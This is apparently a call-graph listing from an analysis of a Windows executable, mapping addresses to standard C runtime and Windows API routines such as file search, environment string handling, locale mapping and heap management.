7ff652ef1344 _wfindfirst32i64 37 API calls 20275->20276 20277 7ff652ef1f98 20275->20277 20279 7ff652ef1fac 20275->20279 20276->20275 20278 7ff652eeb6b8 _wfindfirst32i64 17 API calls 20277->20278 20278->20279 20279->20268 20281 7ff652eea4c0 20280->20281 20282 7ff652eea4c9 20280->20282 20281->20282 20601 7ff652ee9fc0 20281->20601 20282->20138 20282->20139 20287 7ff652ef80a9 20286->20287 20291 7ff652ef80d6 20286->20291 20288 7ff652ef80ae 20287->20288 20287->20291 20289 7ff652ee5cb4 _get_daylight 11 API calls 20288->20289 20290 7ff652ef80b3 20289->20290 20293 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20290->20293 20292 7ff652ef811a 20291->20292 20294 7ff652ef8139 20291->20294 20308 7ff652ef810e __crtLCMapStringW 20291->20308 20295 7ff652ee5cb4 _get_daylight 11 API calls 20292->20295 20297 7ff652ef80be 20293->20297 20298 7ff652ef8155 20294->20298 20299 7ff652ef8143 20294->20299 20296 7ff652ef811f 20295->20296 20300 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20296->20300 20297->20132 20302 7ff652ee5788 45 API calls 20298->20302 20301 7ff652ee5cb4 _get_daylight 11 API calls 20299->20301 20300->20308 20303 7ff652ef8148 20301->20303 20304 7ff652ef8162 20302->20304 20305 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20303->20305 20304->20308 20648 7ff652ef9bc0 20304->20648 20305->20308 20308->20132 20309 7ff652ee5cb4 _get_daylight 11 API calls 20309->20308 20311 7ff652ee9f65 20310->20311 20312 7ff652ee9f61 20310->20312 20333 7ff652ef3440 20311->20333 20312->20197 20325 7ff652eea2a0 20312->20325 20317 7ff652ee9f83 20359 7ff652eea030 20317->20359 20318 7ff652ee9f77 20319 7ff652eeb700 __free_lconv_mon 11 API calls 20318->20319 20319->20312 20322 7ff652eeb700 __free_lconv_mon 11 API calls 20323 7ff652ee9faa 20322->20323 20324 7ff652eeb700 __free_lconv_mon 11 API calls 20323->20324 20324->20312 20326 7ff652eea2c9 20325->20326 20331 7ff652eea2e2 20325->20331 20326->20197 20327 7ff652eef948 _get_daylight 11 API calls 20327->20331 20328 7ff652eea372 20330 7ff652eeb700 __free_lconv_mon 11 API calls 20328->20330 20329 7ff652ef1640 WideCharToMultiByte 20329->20331 20330->20326 20331->20326 20331->20327 20331->20328 20331->20329 20332 7ff652eeb700 __free_lconv_mon 11 API calls 20331->20332 20332->20331 20334 7ff652ef344d 20333->20334 20335 7ff652ee9f6a 20333->20335 20378 7ff652eebfd4 20334->20378 20339 7ff652ef377c GetEnvironmentStringsW 20335->20339 20340 7ff652ee9f6f 20339->20340 20341 7ff652ef37ac 20339->20341 20340->20317 20340->20318 20342 7ff652ef1640 WideCharToMultiByte 20341->20342 20343 7ff652ef37fd 20342->20343 20344 7ff652ef3804 FreeEnvironmentStringsW 20343->20344 20345 7ff652eee3ac _fread_nolock 12 API calls 20343->20345 20344->20340 20346 7ff652ef3817 20345->20346 20347 7ff652ef381f 20346->20347 20348 7ff652ef3828 20346->20348 20350 7ff652eeb700 __free_lconv_mon 11 API calls 20347->20350 20349 7ff652ef1640 WideCharToMultiByte 20348->20349 20352 7ff652ef384b 20349->20352 20351 7ff652ef3826 20350->20351 20351->20344 20353 7ff652ef384f 20352->20353 20354 7ff652ef3859 20352->20354 20355 7ff652eeb700 __free_lconv_mon 11 API calls 20353->20355 20356 7ff652eeb700 __free_lconv_mon 11 API calls 20354->20356 20357 7ff652ef3857 FreeEnvironmentStringsW 20355->20357 20356->20357 20357->20340 20360 7ff652eea055 20359->20360 20361 7ff652eef948 _get_daylight 11 API calls 20360->20361 20373 7ff652eea08b 20361->20373 20362 7ff652eea093 20363 7ff652eeb700 __free_lconv_mon 11 API calls 20362->20363 20364 7ff652ee9f8b 20363->20364 20364->20322 20365 7ff652eea106 20366 7ff652eeb700 __free_lconv_mon 11 API calls 20365->20366 20366->20364 20367 7ff652eef948 _get_daylight 11 API calls 20367->20373 20368 7ff652eea0f5 20527 7ff652eea25c 20368->20527 20370 7ff652eeb25c __std_exception_copy 37 API calls 20370->20373 20372 7ff652eeb700 __free_lconv_mon 11 API calls 20372->20362 20373->20362 20373->20365 20373->20367 20373->20368 20373->20370 20374 7ff652eea12b 20373->20374 20375 7ff652eeb700 __free_lconv_mon 11 API calls 20373->20375 20376 7ff652eeb6b8 _wfindfirst32i64 17 API calls 20374->20376 20375->20373 20377 7ff652eea13e 20376->20377 20379 7ff652eebfe5 FlsGetValue 20378->20379 20380 7ff652eec000 FlsSetValue 20378->20380 20381 7ff652eebffa 20379->20381 20382 7ff652eebff2 20379->20382 20380->20382 20383 7ff652eec00d 20380->20383 20381->20380 20384 7ff652eebff8 20382->20384 20385 7ff652eeb2bc __FrameHandler3::FrameUnwindToEmptyState 45 API calls 20382->20385 20386 7ff652eef948 _get_daylight 11 API calls 20383->20386 20398 7ff652ef3114 20384->20398 20387 7ff652eec075 20385->20387 20388 7ff652eec01c 20386->20388 20389 7ff652eec03a FlsSetValue 20388->20389 20390 7ff652eec02a FlsSetValue 20388->20390 20392 7ff652eec058 20389->20392 20393 7ff652eec046 FlsSetValue 20389->20393 20391 7ff652eec033 20390->20391 20394 7ff652eeb700 __free_lconv_mon 11 API calls 20391->20394 20395 7ff652eebcac _get_daylight 11 API calls 20392->20395 20393->20391 20394->20382 20396 7ff652eec060 20395->20396 20397 7ff652eeb700 __free_lconv_mon 11 API calls 20396->20397 20397->20384 20421 7ff652ef3384 20398->20421 20400 7ff652ef3149 20436 7ff652ef2e14 20400->20436 20403 7ff652ef3166 20403->20335 20404 7ff652eee3ac _fread_nolock 12 API calls 20405 7ff652ef3177 20404->20405 20406 7ff652ef317f 20405->20406 20408 7ff652ef318e 20405->20408 20407 7ff652eeb700 __free_lconv_mon 11 API calls 20406->20407 20407->20403 20408->20408 20443 7ff652ef34bc 20408->20443 20411 7ff652ef328a 20412 7ff652ee5cb4 _get_daylight 11 API calls 20411->20412 20414 7ff652ef328f 20412->20414 20413 7ff652ef32e5 20416 7ff652ef334c 20413->20416 20454 7ff652ef2c44 20413->20454 20417 7ff652eeb700 __free_lconv_mon 11 API calls 20414->20417 20415 7ff652ef32a4 20415->20413 20418 7ff652eeb700 __free_lconv_mon 11 API calls 20415->20418 20420 7ff652eeb700 __free_lconv_mon 11 API calls 20416->20420 20417->20403 20418->20413 20420->20403 20422 7ff652ef33a7 20421->20422 20424 7ff652ef33b1 20422->20424 20469 7ff652ef11a8 EnterCriticalSection 20422->20469 20425 7ff652ef3423 20424->20425 20428 7ff652eeb2bc __FrameHandler3::FrameUnwindToEmptyState 45 API calls 20424->20428 20425->20400 20429 7ff652ef343b 20428->20429 20431 7ff652ef3492 20429->20431 20433 7ff652eebfd4 50 API calls 20429->20433 20431->20400 20434 7ff652ef347c 20433->20434 20435 7ff652ef3114 65 API calls 20434->20435 20435->20431 20437 7ff652ee5788 45 API calls 20436->20437 20438 7ff652ef2e28 20437->20438 20439 7ff652ef2e34 GetOEMCP 20438->20439 20440 7ff652ef2e46 20438->20440 20441 7ff652ef2e5b 20439->20441 20440->20441 20442 7ff652ef2e4b GetACP 20440->20442 20441->20403 20441->20404 20442->20441 20444 7ff652ef2e14 47 API calls 20443->20444 20445 7ff652ef34e9 20444->20445 20447 7ff652ef3526 IsValidCodePage 20445->20447 20451 7ff652ef363f 20445->20451 20453 7ff652ef3540 __scrt_get_show_window_mode 20445->20453 20446 7ff652edc010 _wfindfirst32i64 8 API calls 20448 7ff652ef3281 20446->20448 20449 7ff652ef3537 20447->20449 20447->20451 20448->20411 20448->20415 20450 7ff652ef3566 GetCPInfo 20449->20450 20449->20453 20450->20451 20450->20453 20451->20446 20470 7ff652ef2f2c 20453->20470 20526 7ff652ef11a8 EnterCriticalSection 20454->20526 20471 7ff652ef2f69 GetCPInfo 20470->20471 20472 7ff652ef305f 20470->20472 20471->20472 20473 7ff652ef2f7c 20471->20473 20474 7ff652edc010 _wfindfirst32i64 8 API calls 20472->20474 20475 7ff652ef3c90 48 API calls 20473->20475 20476 7ff652ef30fe 20474->20476 20477 7ff652ef2ff3 20475->20477 20476->20451 20481 7ff652ef8c34 20477->20481 20480 7ff652ef8c34 54 API calls 20480->20472 20482 7ff652ee5788 45 API calls 20481->20482 20483 7ff652ef8c59 20482->20483 20486 7ff652ef8900 20483->20486 20487 7ff652ef8941 20486->20487 20488 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20487->20488 20492 7ff652ef898b 20488->20492 20489 7ff652ef8c09 20490 7ff652edc010 _wfindfirst32i64 8 API calls 20489->20490 20491 7ff652ef3026 20490->20491 20491->20480 20492->20489 20493 7ff652eee3ac _fread_nolock 12 API calls 20492->20493 20494 7ff652ef8ac1 20492->20494 20495 7ff652ef89c3 20492->20495 20493->20495 20494->20489 20496 7ff652eeb700 __free_lconv_mon 11 API calls 20494->20496 20495->20494 20497 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20495->20497 20496->20489 20498 7ff652ef8a36 20497->20498 20498->20494 20517 7ff652eefd94 20498->20517 20501 7ff652ef8ad2 20504 7ff652eee3ac _fread_nolock 12 API calls 20501->20504 20505 7ff652ef8ba4 20501->20505 20507 7ff652ef8af0 20501->20507 20502 7ff652ef8a81 20502->20494 20503 7ff652eefd94 __crtLCMapStringW 6 API calls 20502->20503 20503->20494 20504->20507 20505->20494 20506 7ff652eeb700 __free_lconv_mon 11 API calls 20505->20506 20506->20494 20507->20494 20508 7ff652eefd94 __crtLCMapStringW 6 API calls 20507->20508 20509 7ff652ef8b70 20508->20509 20509->20505 20510 7ff652ef8b90 20509->20510 20511 7ff652ef8ba6 20509->20511 20512 7ff652ef1640 WideCharToMultiByte 20510->20512 20513 7ff652ef1640 WideCharToMultiByte 20511->20513 20514 7ff652ef8b9e 20512->20514 20513->20514 20514->20505 20515 7ff652ef8bbe 20514->20515 20515->20494 20516 7ff652eeb700 __free_lconv_mon 11 API calls 20515->20516 20516->20494 20518 7ff652eef9c0 __crtLCMapStringW 5 API calls 20517->20518 20519 7ff652eefdd2 20518->20519 20521 7ff652eefdda 20519->20521 20523 7ff652eefe80 20519->20523 20521->20494 20521->20501 20521->20502 20522 7ff652eefe43 LCMapStringW 20522->20521 20524 7ff652eef9c0 __crtLCMapStringW 5 API calls 20523->20524 20525 7ff652eefeae __crtLCMapStringW 20524->20525 20525->20522 20528 7ff652eea261 20527->20528 20532 7ff652eea0fd 20527->20532 20529 7ff652eea28a 20528->20529 20530 7ff652eeb700 __free_lconv_mon 11 API calls 20528->20530 20531 7ff652eeb700 __free_lconv_mon 11 API calls 20529->20531 20530->20528 20531->20532 20532->20372 20534 7ff652ef7410 20533->20534 20535 7ff652ef73f9 20533->20535 20534->20535 20538 7ff652ef741e 20534->20538 20536 7ff652ee5cb4 _get_daylight 11 API calls 20535->20536 20537 7ff652ef73fe 20536->20537 20539 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20537->20539 20540 7ff652ee5788 45 API calls 20538->20540 20541 7ff652ef7409 20538->20541 20539->20541 20540->20541 20541->20209 20543 7ff652ee5788 45 API calls 20542->20543 20544 7ff652efa029 20543->20544 20547 7ff652ef9c80 20544->20547 20552 7ff652ef9cce 20547->20552 20548 7ff652edc010 _wfindfirst32i64 8 API calls 20549 7ff652ef82b5 20548->20549 20549->20209 20549->20236 20550 7ff652ef9d55 20551 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20550->20551 20556 7ff652ef9d59 20550->20556 20554 7ff652ef9ded 20551->20554 20552->20550 20553 7ff652ef9d40 GetCPInfo 20552->20553 20552->20556 20553->20550 20553->20556 20555 7ff652eee3ac _fread_nolock 12 API calls 20554->20555 20554->20556 20557 7ff652ef9e24 20554->20557 20555->20557 20556->20548 20557->20556 20558 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20557->20558 20559 7ff652ef9e92 20558->20559 20560 7ff652ef9f74 20559->20560 20561 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20559->20561 20560->20556 20562 7ff652eeb700 __free_lconv_mon 11 API calls 20560->20562 20563 7ff652ef9eb8 20561->20563 20562->20556 20563->20560 20564 7ff652eee3ac _fread_nolock 12 API calls 20563->20564 20565 7ff652ef9ee5 20563->20565 20564->20565 20565->20560 20566 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20565->20566 20567 7ff652ef9f5c 20566->20567 20568 7ff652ef9f62 20567->20568 20569 7ff652ef9f7c 20567->20569 20568->20560 20571 7ff652eeb700 __free_lconv_mon 11 API calls 20568->20571 20576 7ff652eefc18 20569->20576 20571->20560 20573 7ff652ef9fbb 20573->20556 20575 7ff652eeb700 __free_lconv_mon 11 API calls 20573->20575 20574 7ff652eeb700 __free_lconv_mon 11 API calls 20574->20573 20575->20556 20577 7ff652eef9c0 __crtLCMapStringW 5 API calls 20576->20577 20578 7ff652eefc56 20577->20578 20579 7ff652eefc5e 20578->20579 20580 7ff652eefe80 __crtLCMapStringW 5 API calls 20578->20580 20579->20573 20579->20574 20581 7ff652eefcc7 CompareStringW 20580->20581 20581->20579 20583 7ff652ef8cf1 20582->20583 20584 7ff652ef8d0a HeapSize 20582->20584 20585 7ff652ee5cb4 _get_daylight 11 API calls 20583->20585 20586 7ff652ef8cf6 20585->20586 20587 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20586->20587 20588 7ff652ef8d01 20587->20588 20588->20241 20590 7ff652ef13c1 20589->20590 20591 7ff652ef13cb 20589->20591 20592 7ff652eee3ac _fread_nolock 12 API calls 20590->20592 20593 7ff652ef13d0 20591->20593 20599 7ff652ef13d7 _get_daylight 20591->20599 20598 7ff652ef13c9 20592->20598 20596 7ff652eeb700 __free_lconv_mon 11 API calls 20593->20596 20594 7ff652ef13dd 20597 7ff652ee5cb4 _get_daylight 11 API calls 20594->20597 20595 7ff652ef140a HeapReAlloc 20595->20598 20595->20599 20596->20598 20597->20598 20598->20245 20599->20594 20599->20595 20600 7ff652ef43e0 _get_daylight 2 API calls 20599->20600 20600->20599 20602 7ff652ee9fd5 20601->20602 20603 7ff652ee9fd9 20601->20603 20602->20282 20614 7ff652eea380 20602->20614 20622 7ff652ef388c GetEnvironmentStringsW 20603->20622 20606 7ff652ee9ff2 20629 7ff652eea140 20606->20629 20607 7ff652ee9fe6 20608 7ff652eeb700 __free_lconv_mon 11 API calls 20607->20608 20608->20602 20611 7ff652eeb700 __free_lconv_mon 11 API calls 20612 7ff652eea019 20611->20612 20613 7ff652eeb700 __free_lconv_mon 11 API calls 20612->20613 20613->20602 20615 7ff652eea3a3 20614->20615 20620 7ff652eea3ba 20614->20620 20615->20282 20616 7ff652eef948 _get_daylight 11 API calls 20616->20620 20617 7ff652eea42e 20619 7ff652eeb700 __free_lconv_mon 11 API calls 20617->20619 20618 7ff652ef03f0 MultiByteToWideChar _fread_nolock 20618->20620 20619->20615 20620->20615 20620->20616 20620->20617 20620->20618 20621 7ff652eeb700 __free_lconv_mon 11 API calls 20620->20621 20621->20620 20623 7ff652ee9fde 20622->20623 20624 7ff652ef38b0 20622->20624 20623->20606 20623->20607 20625 7ff652eee3ac _fread_nolock 12 API calls 20624->20625 20627 7ff652ef38e7 memcpy_s 20625->20627 20626 7ff652eeb700 __free_lconv_mon 11 API calls 20628 7ff652ef3907 FreeEnvironmentStringsW 20626->20628 20627->20626 20628->20623 20630 7ff652eea168 20629->20630 20631 7ff652eef948 _get_daylight 11 API calls 20630->20631 20641 7ff652eea1a3 20631->20641 20632 7ff652eeb700 __free_lconv_mon 11 API calls 20633 7ff652ee9ffa 20632->20633 20633->20611 20634 7ff652eea225 20635 7ff652eeb700 __free_lconv_mon 11 API calls 20634->20635 20635->20633 20636 7ff652eef948 _get_daylight 11 API calls 20636->20641 20637 7ff652eea214 20639 7ff652eea25c 11 API calls 20637->20639 20638 7ff652ef1344 _wfindfirst32i64 37 API calls 20638->20641 20640 7ff652eea21c 20639->20640 20643 7ff652eeb700 __free_lconv_mon 11 API calls 20640->20643 20641->20634 20641->20636 20641->20637 20641->20638 20642 7ff652eea248 20641->20642 20645 7ff652eeb700 __free_lconv_mon 11 API calls 20641->20645 20646 7ff652eea1ab 20641->20646 20644 7ff652eeb6b8 _wfindfirst32i64 17 API calls 20642->20644 20643->20646 20647 7ff652eea25a 20644->20647 20645->20641 20646->20632 20650 7ff652ef9be9 __crtLCMapStringW 20648->20650 20649 7ff652ef819e 20649->20308 20649->20309 20650->20649 20651 7ff652eefc18 6 API calls 20650->20651 20651->20649 19894 7ff652ed9d9b 19897 7ff652ed9da1 19894->19897 19895 7ff652edb850 12 API calls 19896 7ff652eda656 19895->19896 19897->19895 19897->19896 16223 7ff652eea715 16235 7ff652eeb188 16223->16235 16240 7ff652eebf00 GetLastError 16235->16240 16241 7ff652eebf24 FlsGetValue 16240->16241 16242 7ff652eebf41 FlsSetValue 16240->16242 16243 7ff652eebf3b 16241->16243 16259 7ff652eebf31 SetLastError 16241->16259 16244 7ff652eebf53 16242->16244 16242->16259 16243->16242 16271 7ff652eef948 16244->16271 16247 7ff652eebfcd 16250 7ff652eeb2bc __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16247->16250 16248 7ff652eeb191 16262 7ff652eeb2bc 16248->16262 16255 7ff652eebfd2 16250->16255 16251 7ff652eebf80 FlsSetValue 16253 7ff652eebf9e 16251->16253 16254 7ff652eebf8c FlsSetValue 16251->16254 16252 7ff652eebf70 FlsSetValue 16256 7ff652eebf79 16252->16256 16284 7ff652eebcac 16253->16284 16254->16256 16278 7ff652eeb700 16256->16278 16259->16247 16259->16248 16332 7ff652ef44a0 16262->16332 16272 7ff652eef959 _get_daylight 16271->16272 16273 7ff652eef9aa 16272->16273 16274 7ff652eef98e HeapAlloc 16272->16274 16289 7ff652ef43e0 16272->16289 16292 7ff652ee5cb4 16273->16292 16274->16272 16275 7ff652eebf62 16274->16275 16275->16251 16275->16252 16279 7ff652eeb705 RtlFreeHeap 16278->16279 16281 7ff652eeb734 16278->16281 16280 7ff652eeb720 GetLastError 16279->16280 16279->16281 16282 7ff652eeb72d __free_lconv_mon 16280->16282 16281->16259 16283 7ff652ee5cb4 _get_daylight 9 API calls 16282->16283 16283->16281 16318 7ff652eebb84 16284->16318 16295 7ff652ef4420 16289->16295 16301 7ff652eec078 GetLastError 16292->16301 16294 7ff652ee5cbd 16294->16275 16300 7ff652ef11a8 EnterCriticalSection 16295->16300 16302 7ff652eec0b9 FlsSetValue 16301->16302 16303 7ff652eec09c 16301->16303 16304 7ff652eec0cb 16302->16304 16307 7ff652eec0a9 16302->16307 16303->16302 16303->16307 16306 7ff652eef948 _get_daylight 5 API calls 16304->16306 16305 7ff652eec125 SetLastError 16305->16294 16308 7ff652eec0da 16306->16308 16307->16305 16309 7ff652eec0f8 FlsSetValue 16308->16309 16310 7ff652eec0e8 FlsSetValue 16308->16310 16311 7ff652eec104 FlsSetValue 16309->16311 16312 7ff652eec116 16309->16312 16313 7ff652eec0f1 16310->16313 16311->16313 16315 7ff652eebcac _get_daylight 5 API calls 16312->16315 16314 7ff652eeb700 __free_lconv_mon 5 API calls 16313->16314 16314->16307 16316 7ff652eec11e 16315->16316 16317 7ff652eeb700 __free_lconv_mon 5 API calls 16316->16317 16317->16305 16330 7ff652ef11a8 EnterCriticalSection 16318->16330 16366 7ff652ef4458 16332->16366 16371 7ff652ef11a8 EnterCriticalSection 16366->16371 19538 7ff652efbe14 19541 7ff652ee5b68 LeaveCriticalSection 19538->19541 21002 7ff652efbc8e 21003 7ff652efbc9e 21002->21003 21006 7ff652ee5b68 LeaveCriticalSection 21003->21006 19936 7ff652eebd80 19937 7ff652eebd85 19936->19937 19938 7ff652eebd9a 19936->19938 19942 7ff652eebda0 19937->19942 19943 7ff652eebde2 19942->19943 19944 7ff652eebdea 19942->19944 19945 7ff652eeb700 __free_lconv_mon 11 API calls 19943->19945 19946 7ff652eeb700 __free_lconv_mon 11 API calls 19944->19946 19945->19944 19947 7ff652eebdf7 19946->19947 19948 7ff652eeb700 __free_lconv_mon 11 API calls 19947->19948 19949 7ff652eebe04 19948->19949 19950 7ff652eeb700 __free_lconv_mon 11 API calls 19949->19950 19951 7ff652eebe11 19950->19951 19952 7ff652eeb700 __free_lconv_mon 11 API calls 19951->19952 19953 7ff652eebe1e 19952->19953 19954 7ff652eeb700 __free_lconv_mon 11 API calls 19953->19954 19955 7ff652eebe2b 19954->19955 19956 7ff652eeb700 __free_lconv_mon 11 API calls 19955->19956 19957 7ff652eebe38 19956->19957 19958 7ff652eeb700 __free_lconv_mon 11 API calls 19957->19958 19959 7ff652eebe45 19958->19959 19960 7ff652eeb700 __free_lconv_mon 11 API calls 19959->19960 19961 7ff652eebe55 19960->19961 19962 7ff652eeb700 __free_lconv_mon 11 API calls 19961->19962 19963 7ff652eebe65 19962->19963 19968 7ff652eebc4c 19963->19968 19982 7ff652ef11a8 EnterCriticalSection 19968->19982 20687 7ff652ef2500 20698 7ff652ef8494 20687->20698 20699 7ff652ef84a1 20698->20699 20700 7ff652eeb700 __free_lconv_mon 11 API calls 20699->20700 20702 7ff652ef84bd 20699->20702 20700->20699 20701 7ff652eeb700 __free_lconv_mon 11 API calls 20701->20702 20702->20701 20703 7ff652ef2509 20702->20703 20704 7ff652ef11a8 EnterCriticalSection 20703->20704 20705 7ff652eeab00 20708 7ff652eeaa80 20705->20708 20715 7ff652ef11a8 EnterCriticalSection 20708->20715 20716 7ff652ee5b00 20717 7ff652ee5b0b 20716->20717 20725 7ff652eeff54 20717->20725 20738 7ff652ef11a8 EnterCriticalSection 20725->20738 16433 7ff652ee8670 16434 7ff652ee869e 16433->16434 16435 7ff652ee86d7 16433->16435 16437 7ff652ee5cb4 _get_daylight 11 API calls 16434->16437 16435->16434 16436 7ff652ee86dc FindFirstFileExW 16435->16436 16438 7ff652ee8745 16436->16438 16439 7ff652ee86fe GetLastError 16436->16439 16440 7ff652ee86a3 16437->16440 16493 7ff652ee88e0 16438->16493 16442 7ff652ee8735 16439->16442 16443 7ff652ee8709 16439->16443 16444 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16440->16444 16446 7ff652ee5cb4 _get_daylight 11 API calls 16442->16446 16443->16442 16448 7ff652ee8725 16443->16448 16449 7ff652ee8713 16443->16449 16461 7ff652ee86ae 16444->16461 16446->16461 16447 7ff652ee88e0 _wfindfirst32i64 10 API calls 16450 7ff652ee876b 16447->16450 16452 7ff652ee5cb4 _get_daylight 11 API calls 16448->16452 16449->16442 16451 7ff652ee8718 16449->16451 16454 7ff652ee88e0 _wfindfirst32i64 10 API calls 16450->16454 16455 7ff652ee5cb4 _get_daylight 11 API calls 16451->16455 16452->16461 16453 7ff652edc010 _wfindfirst32i64 8 API calls 16456 7ff652ee86c2 16453->16456 16457 7ff652ee8779 16454->16457 16455->16461 16500 7ff652ef1344 16457->16500 16460 7ff652ee87a3 16462 7ff652eeb6b8 _wfindfirst32i64 17 API calls 16460->16462 16461->16453 16463 7ff652ee87b7 16462->16463 16464 7ff652ee87e1 16463->16464 16466 7ff652ee8820 FindNextFileW 16463->16466 16465 7ff652ee5cb4 _get_daylight 11 API calls 16464->16465 16467 7ff652ee87e6 16465->16467 16468 7ff652ee8870 16466->16468 16469 7ff652ee882f GetLastError 16466->16469 16470 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16467->16470 16472 7ff652ee88e0 _wfindfirst32i64 10 API calls 16468->16472 16473 7ff652ee8863 16469->16473 16474 7ff652ee883a 16469->16474 16471 7ff652ee87f1 16470->16471 16477 7ff652edc010 _wfindfirst32i64 8 API calls 16471->16477 16476 7ff652ee8888 16472->16476 16475 7ff652ee5cb4 _get_daylight 11 API calls 16473->16475 16474->16473 16479 7ff652ee8844 16474->16479 16480 7ff652ee8856 16474->16480 16475->16471 16478 7ff652ee88e0 _wfindfirst32i64 10 API calls 16476->16478 16481 7ff652ee8804 16477->16481 16482 7ff652ee8896 16478->16482 16479->16473 16483 7ff652ee8849 16479->16483 16484 7ff652ee5cb4 _get_daylight 11 API calls 16480->16484 16485 7ff652ee88e0 _wfindfirst32i64 10 API calls 16482->16485 16486 7ff652ee5cb4 _get_daylight 11 API calls 16483->16486 16484->16471 16487 7ff652ee88a4 16485->16487 16486->16471 16488 7ff652ef1344 _wfindfirst32i64 37 API calls 16487->16488 16489 7ff652ee88c2 16488->16489 16489->16471 16490 7ff652ee88ca 16489->16490 16491 7ff652eeb6b8 _wfindfirst32i64 17 API calls 16490->16491 16492 7ff652ee88de 16491->16492 16494 7ff652ee88fe FileTimeToSystemTime 16493->16494 16495 7ff652ee88f8 16493->16495 16496 7ff652ee890d SystemTimeToTzSpecificLocalTime 16494->16496 16497 7ff652ee8923 16494->16497 16495->16494 16495->16497 16496->16497 16498 7ff652edc010 _wfindfirst32i64 8 API calls 16497->16498 16499 7ff652ee875d 16498->16499 16499->16447 16501 7ff652ef1351 16500->16501 16502 7ff652ef135b 16500->16502 16501->16502 16507 7ff652ef1377 16501->16507 16503 7ff652ee5cb4 _get_daylight 11 API calls 16502->16503 16504 7ff652ef1363 16503->16504 16505 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16504->16505 16506 7ff652ee8797 16505->16506 16506->16460 16506->16461 16507->16506 16508 7ff652ee5cb4 _get_daylight 11 API calls 16507->16508 16508->16504 20001 7ff652eda76d 20003 7ff652eda772 20001->20003 20002 7ff652edb850 12 API calls 20005 7ff652eda656 20002->20005 20003->20003 20008 7ff652eda8da 20003->20008 20010 7ff652eda443 20003->20010 20011 7ff652edb960 20003->20011 20006 7ff652edb960 12 API calls 20007 7ff652edabe8 20006->20007 20009 7ff652edb960 12 API calls 20007->20009 20008->20006 20008->20010 20009->20010 20010->20002 20010->20005 20012 7ff652edb9c0 20011->20012 20013 7ff652edbefa 20012->20013 20018 7ff652edb9df 20012->20018 20014 7ff652edc144 8 API calls 20013->20014 20015 7ff652edbeff 20014->20015 20016 7ff652edc010 _wfindfirst32i64 8 API calls 20017 7ff652edbedc 20016->20017 20017->20008 20018->20016 20797 7ff652edc2e0 20798 7ff652edc2f0 20797->20798 20814 7ff652eea95c 20798->20814 20800 7ff652edc2fc 20820 7ff652edc5d8 20800->20820 20802 7ff652edc8bc 7 API calls 20804 7ff652edc395 20802->20804 20803 7ff652edc314 _RTC_Initialize 20812 7ff652edc369 20803->20812 20825 7ff652edc788 20803->20825 20806 7ff652edc329 20828 7ff652ee9dc8 20806->20828 20812->20802 20813 7ff652edc385 20812->20813 20815 7ff652eea96d 20814->20815 20816 7ff652eea975 20815->20816 20817 7ff652ee5cb4 _get_daylight 11 API calls 20815->20817 20816->20800 20818 7ff652eea984 20817->20818 20819 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20818->20819 20819->20816 20821 7ff652edc5e9 20820->20821 20824 7ff652edc5ee __scrt_release_startup_lock 20820->20824 20822 7ff652edc8bc 7 API calls 20821->20822 20821->20824 20823 7ff652edc662 20822->20823 20824->20803 20853 7ff652edc74c 20825->20853 20827 7ff652edc791 20827->20806 20829 7ff652ee9de8 20828->20829 20830 7ff652edc335 20828->20830 20831 7ff652ee9df0 20829->20831 20832 7ff652ee9e06 GetModuleFileNameW 20829->20832 20830->20812 20852 7ff652edc85c InitializeSListHead 20830->20852 20833 7ff652ee5cb4 _get_daylight 11 API calls 20831->20833 20836 7ff652ee9e31 20832->20836 20834 7ff652ee9df5 20833->20834 20835 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20834->20835 20835->20830 20868 7ff652ee9d68 20836->20868 20839 7ff652ee9e79 20840 7ff652ee5cb4 _get_daylight 11 API calls 20839->20840 20841 7ff652ee9e7e 20840->20841 20844 7ff652eeb700 __free_lconv_mon 11 API calls 20841->20844 20842 7ff652ee9eb3 20845 7ff652eeb700 __free_lconv_mon 11 API calls 20842->20845 20843 7ff652ee9e91 20843->20842 20846 7ff652ee9edf 20843->20846 20847 7ff652ee9ef8 20843->20847 20844->20830 20845->20830 20848 7ff652eeb700 __free_lconv_mon 11 API calls 20846->20848 20849 7ff652eeb700 __free_lconv_mon 11 API calls 20847->20849 20850 7ff652ee9ee8 20848->20850 20849->20842 20851 7ff652eeb700 __free_lconv_mon 11 API calls 20850->20851 20851->20830 20854 7ff652edc75f 20853->20854 20855 7ff652edc766 20853->20855 20854->20827 20857 7ff652eeaf9c 20855->20857 20860 7ff652eeabd8 20857->20860 20867 7ff652ef11a8 EnterCriticalSection 20860->20867 20869 7ff652ee9d80 20868->20869 20870 7ff652ee9db8 20868->20870 20869->20870 20871 7ff652eef948 _get_daylight 11 API calls 20869->20871 20870->20839 20870->20843 20872 7ff652ee9dae 20871->20872 20873 7ff652eeb700 __free_lconv_mon 11 API calls 20872->20873 20873->20870 16509 7ff652ef04dc 16510 7ff652ef06ce 16509->16510 16512 7ff652ef051e _isindst 16509->16512 16511 7ff652ee5cb4 _get_daylight 11 API calls 16510->16511 16527 7ff652ef06be 16511->16527 16512->16510 16515 7ff652ef059e _isindst 16512->16515 16513 7ff652edc010 _wfindfirst32i64 8 API calls 16514 7ff652ef06e9 16513->16514 16530 7ff652ef70e4 16515->16530 16520 7ff652ef06fa 16522 7ff652eeb6b8 _wfindfirst32i64 17 API calls 16520->16522 16524 7ff652ef070e 16522->16524 16527->16513 16528 7ff652ef05fb 16528->16527 16554 7ff652ef7128 16528->16554 16531 7ff652ef70f3 16530->16531 16535 7ff652ef05bc 16530->16535 16561 7ff652ef11a8 EnterCriticalSection 16531->16561 16536 7ff652ef64e8 16535->16536 16537 7ff652ef64f1 16536->16537 16538 7ff652ef05d1 16536->16538 16539 7ff652ee5cb4 _get_daylight 11 API calls 16537->16539 16538->16520 16542 7ff652ef6518 16538->16542 16540 7ff652ef64f6 